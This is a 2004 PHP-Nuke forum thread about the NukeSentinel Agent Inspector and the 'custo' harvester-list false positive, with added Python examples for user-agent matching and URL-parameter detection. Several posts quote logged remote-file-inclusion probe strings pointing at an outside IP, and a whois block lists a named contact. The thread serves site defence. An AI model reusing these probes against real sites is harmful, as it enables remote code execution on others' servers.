Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Fri Jun 25, 2004 7:42 am

Sentinel traps various harvesters by examining the browser agent that is being used/forged. The list of harvesters is available and maintainable through the Sentinel™ administration panel. It is not always readily apparent why a particular agent gets flagged. There is now a module called Agent Inspector under my Site Navigation menu. Whenever you need an explanation as to what harvester entry trapped the agent that is in the email that Sentinel™ sent you, just use this utility.
Let me know if you find bugs or think it needs enhancing.

Salieri
Hangin' Around
Joined: Nov 07, 2003
Posts: 33
Posted: Fri Jun 25, 2004 8:36 am

Has this feature been implemented in the Sentinel packages?
Sounds great.

Raven
Posted: Fri Jun 25, 2004 8:40 am

In the next release (v2.0) the Agent that trapped it will be included in the Email.

squiresmk
Regular
Joined: May 31, 2004
Posts: 95
Location: NY
Posted: Fri Jun 25, 2004 9:04 am

Sentinel 2.0 is looking extremely awesome.
"There is no obvious match for ==> an obvious match.
If you haven't already, please post the contents of the email you received in one of the Sentinel™ forums."
_________________ Captain of the Internet Debate Team.

dean
Worker
Joined: Apr 14, 2004
Posts: 193
Posted: Fri Jun 25, 2004 9:55 pm

Received this notification and no obvious conclusion was provided by the new Explainer:
Date & Time: 2004-06-25 05:19:52
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)
Query String: alaskandog.com/ipw-web/portal/cms/modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&album=http://217.59.104.226/&cat=http://217.59.104.226/&pos=http://217.59.104.226/
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET

xfsunolesphp
Regular
Joined: Aug 23, 2003
Posts: 77
Posted: Fri Jun 25, 2004 10:07 pm

It appears it is trying to hack your site in a bad way.

sharlein
Member Emeritus
Joined: Nov 19, 2002
Posts: 322
Location: On the Road
Posted: Fri Jun 25, 2004 10:11 pm

Would this be considered a False Positive (using Agent Inspector)?
Code:
Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo
Thanks, Steve
_________________ Give Me Ambiguity Or Give Me Something Else!

sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2496
Posted: Fri Jun 25, 2004 10:17 pm

Yep, would be best to remove custo from the list until we can figure out a way to catch it without killing off every user agent with customer or custom in it.

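The substring match Raven describes in the first post, and the custo false positive sharlein and sixonetonoffun discuss above, as an added Python example. This is not NukeSentinel's code and the thread does not show Sentinel's source: the rule that each harvester entry is matched as a case-insensitive substring of the User-Agent is an assumption drawn from custo trapping "Customer", the HARVESTERS list is constructed (only custo and libcurl are named in the thread), and the agent strings are the two quoted in the thread plus a constructed "Custo 1.0" and a constructed Gecko browser.

```python
"""Agent Inspector style check: which harvester entry traps a User-Agent?

Added example, not NukeSentinel code. HARVESTERS is constructed (only
'custo' and 'libcurl' are mentioned in the thread); the matching rule is
an assumption drawn from the thread's evidence.
"""
import re

# Constructed harvester list. Assumption: Sentinel matches each entry as a
# case-insensitive substring of the User-Agent, which is why 'custo' traps
# '...Cox High Speed Internet Customer'.
HARVESTERS = ["custo", "libcurl", "emailsiphon", "webzip"]

# User-Agent strings quoted in the thread, plus two constructed ones.
UA_COX = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; "
          "Cox High Speed Internet Customer)")
UA_CURL = "curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)"
UA_CUSTO = "Custo 1.0"  # constructed: what a 'custo' entry is presumably meant to catch
UA_GECKO = "Mozilla/5.0 (X11; Linux i686; rv:1.7) Gecko/20040616"  # constructed, legitimate


def explain_substring(agent, harvesters=HARVESTERS):
    """What the Agent Inspector reports: first entry found as a substring, or None."""
    lowered = agent.lower()
    for entry in harvesters:
        if entry.lower() in lowered:
            return entry
    return None


def explain_token(agent, harvesters=HARVESTERS):
    """Stricter variant: the entry must be a whole token, so 'custo' no longer
    matches 'Customer' but still matches 'Custo 1.0'."""
    for entry in harvesters:
        if re.search(r"\b" + re.escape(entry) + r"\b", agent, re.IGNORECASE):
            return entry
    return None


def audit_false_positives(harvesters, known_good_agents, match=explain_substring):
    """Run the list over agents known to be legitimate before deploying it.
    Returns {entry: [agents it would wrongly trap]}; empty dict means clean."""
    hits = {}
    for agent in known_good_agents:
        entry = match(agent, harvesters)
        if entry is not None:
            hits.setdefault(entry, []).append(agent)
    return hits


if __name__ == "__main__":
    for ua in (UA_COX, UA_CURL, UA_CUSTO, UA_GECKO):
        print(f"substring={explain_substring(ua)!s:8} token={explain_token(ua)!s:8} {ua}")
    print(audit_false_positives(HARVESTERS, [UA_COX, UA_GECKO]))
```

explain_substring reproduces what the Agent Inspector printed for sharlein and ConViCT; explain_token shows what a whole-token rule would do instead, which keeps "Custo 1.0" trapped but releases the Cox agents. Token matching trades recall for precision (an entry written as a prefix of a longer product name stops matching), so rather than switching the matcher wholesale, the practical check is audit_false_positives: run the list over a sample of User-Agent strings from your own access logs before deploying a change and fix or drop any entry that traps legitimate browsers, which is what the thread ends up doing with custo.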
sharlein
Posted: Fri Jun 25, 2004 10:30 pm

BobMarion
Former Admin in Good Standing
Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)
Posted: Fri Jun 25, 2004 10:31 pm

The email above shows that there was a trip in the "Filter" blocker. This is done when someone tries to pass http://whatever.tld through the name variable. Had it not been tripped by a true hack it would have been tripped by the "libcurl" harvester list string match.
_________________ Bob Marion
Codito Ergo Sum

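Bob's explanation of the "Filter" blocker, the check that fires when http://whatever.tld is passed through the name variable, as an added Python example; it is not Sentinel's code. The sample requests are the query strings quoted in this thread (dean's, GanjaUK's and bretonmage's probes, including the %3A-encoded form, and ConViCT's benign article request), constructed here as test input; the URL scheme list, the "Abuse - FILTER" label and the safe_module_name() allow-list are this example's assumptions, not Sentinel's.

```python
"""Filter-style check: flag request parameters carrying a URL (RFI probe).

Added example, not NukeSentinel code. The sample requests are the query
strings quoted in this thread; labels and the allow-list are assumptions.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Query strings quoted in the thread (plain and %3A-encoded forms), plus the
# benign article request ConViCT posted. Constructed as test input.
PROBES = [
    "modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&sid=http://217.59.104.226/",
    "modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&p=http%3A//217.59.104.226/",
    "alaskandog.com/ipw-web/portal/cms/modules.php?name=http://217.59.104.226/"
    "&file=http://217.59.104.226/&album=http://217.59.104.226/"
    "&cat=http://217.59.104.226/&pos=http://217.59.104.226/",
]
BENIGN = "modules.php?name=News&file=article&sid=287&mode=&order=0&thold=0"

# Schemes a remote include could fetch; assumption, extend to taste.
URL_PREFIXES = ("http://", "https://", "ftp://")

# PHP-Nuke builds include paths from name= and file=, so an allow-list of
# plain identifiers is the hardening to pair with the detection (assumption).
SAFE_IDENT = re.compile(r"^[A-Za-z0-9_-]+$")


def url_valued_params(request):
    """Return [(param, decoded_value)] for every parameter whose value is a URL.

    parse_qsl percent-decodes, so http%3A// and http:// are treated alike.
    """
    query = urlsplit(request).query
    return [
        (key, value)
        for key, value in parse_qsl(query, keep_blank_values=True)
        if value.lower().startswith(URL_PREFIXES)
    ]


def classify(request):
    """Build a 'Reason' line like the admin mail; the label is constructed."""
    hits = url_valued_params(request)
    if hits:
        return "Abuse - FILTER (URL in " + ", ".join(k for k, _ in hits) + ")"
    return "ok"


def safe_module_name(value):
    """Server-side allow-list for name=/file=: only plain identifiers pass."""
    return bool(SAFE_IDENT.match(value))


if __name__ == "__main__":
    for req in PROBES + [BENIGN]:
        print(classify(req), "<-", req[:70])
```

The probes are a remote-file-inclusion scan: every parameter PHP-Nuke might feed to an include is set to the same attacker URL, so if the server allows remote includes and any module builds a path from the raw value, it fetches and runs the attacker's file. Decoding before matching matters, since the %3A variant is the same attack; and the detection belongs beside an allow-list like safe_module_name(), which rejects anything that is not a plain identifier regardless of encoding tricks.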
sharlein
Posted: Fri Jun 25, 2004 10:55 pm

That IP listed above appears to be trying to hack a lot of Nuke sites. They tried mine, but Sentinel caught them. Excellent work! Thank you

Himmel
Regular
Joined: May 08, 2004
Posts: 77
Posted: Sat Jun 26, 2004 4:30 am

Offtopic: same IP here... Sentinel saved my website!
Ontopic: Thanks Raven for your Agent Inspector, it's great and easy to use.
Can't wait for 2.0.

GanjaUK
Life Cycles Becoming CPU Cycles
Joined: Feb 14, 2004
Posts: 633
Location: England
Posted: Sat Jun 26, 2004 8:35 am

I got some "abuse" blocked yesterday, same IP again.
Code:
modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&sid=http://217.59.104.226/

We must all have places in some script kiddie's little black book.

bretonmage
Hangin' Around
Joined: Mar 30, 2004
Posts: 34
Posted: Sat Jun 26, 2004 9:29 am

Yep, even I've got the same hack attempt:
Code:
modules.php?name=http://217.59.104.226/&page=http://217.59.104.226/
modules.php?name=http://217.59.104.226/&pa=http://217.59.104.226/&pid=http://217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&p=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&meta=http%3A//217.59.104.226/&cat=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&album=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/

All in all, I have around 20 of the same hack attempt with that IP.

SmackDaddy
Involved
Joined: Jun 02, 2004
Posts: 268
Location: Englewood, OH
Posted: Sun Jun 27, 2004 11:42 pm

Raven wrote:
In the next release (v2.0) the Agent that trapped it will be included in the Email.

So with this being the case, what you are saying is that your Agent Inspector won't be a block you'll need to be releasing, correct?
And I see according to Bob's site that 2.0 is *TENTATIVELY* due out in a week or so (July 4th-ish)... so that's good! Thanks for the dedication and efforts of the Sentinel Crew!

Raven
Posted: Mon Jun 28, 2004 4:02 am

That is correct. In v2.0 you should see the Reason more clearly defined in the Admin email.

ConViCT
New Member
Joined: Oct 18, 2002
Posts: 21
Posted: Wed Jul 07, 2004 1:30 pm

I am getting a different Agent - Abuse email, here is where it is pointing to:
mydomain.com/modules.php?name=News&file=article&sid=287&mode=&order=0&thold=0
It is blocking people, but the utility doesn't explain why...
Any ideas?
Thanks,
ConViCt
EDIT NOTE: I use the same string and do not get banned, but people outside are?

Raven
Posted: Wed Jul 07, 2004 1:41 pm

Please post the actual top content of your email but just mask your domain, like this:
Code:
Date & Time: 2004-06-25 05:19:52
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Agent
--------------------
Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer)
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET

ConViCT
Posted: Wed Jul 07, 2004 1:45 pm

Doh! Sorry about that, here it is:
Date & Time: 2004-07-07 12:11:46
Blocked IP: 68.13.204.14
User ID: Anonymous (1)
Reason: Abuse - AGENT
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer)
Query String: www.convictradio.com/modules.php?name=News&file=article&sid=287&mode=&order=0&thold=0
Forwarded For: none
Client IP: none
Remote Address: 68.13.204.14
Remote Port: 1831
Request Method: GET
--------------------
Who-Is for IP
OrgName: Cox Communications Inc.
OrgID: CXA
Address: 1400 Lake Hearn Drive
City: Atlanta
StateProv: GA
PostalCode: 30319
Country: US
NetRange: 68.0.0.0 - 68.15.255.255
CIDR: 68.0.0.0/12
NetName: COX-ATLANTA
NetHandle: NET-68-0-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
NameServer: NS.COX.NET
NameServer: NS.WEST.COX.NET
NameServer: NS.EAST.COX.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-11-12
Updated: 2002-08-21
TechHandle: IC146-ARIN
TechName: Cox Communications, Inc
TechPhone: +1-404-269-7626
TechEmail: abuse@cox.net
OrgAbuseHandle: IC146-ARIN
OrgAbuseName: Cox Communications, Inc
OrgAbusePhone: +1-404-269-7626
OrgAbuseEmail: abuse@cox.net
OrgTechHandle: WILLI-ARIN
OrgTechName: Williams, Matt
OrgTechPhone: +1-404-269-7626
OrgTechEmail: matt.williams@cox.com
Thanks,
ConViCt

Raven
Posted: Wed Jul 07, 2004 2:01 pm

Try using the Agent Inspector on that Agent string. That will tell you why.

ConViCT
Posted: Wed Jul 07, 2004 2:11 pm

Raven
Posted: Wed Jul 07, 2004 2:20 pm

No, the USER AGENT string:
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer)

ConViCT
Posted: Wed Jul 07, 2004 2:26 pm

Ahhhhhhhh!
Thanks Raven!
But what does:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo
mean?
custo?
Huh?
Thanks so much for your help!

ConViCT
Posted: Wed Jul 07, 2004 2:28 pm

Something else I just noticed... every single block by Sentinel has come from Cox.net...

ConViCT
Posted: Wed Jul 07, 2004 2:34 pm

Never mind, figured it out! Noticed in another post that custo should be removed from the harvester list!
Thanks so much Raven, you rock!
ConViCt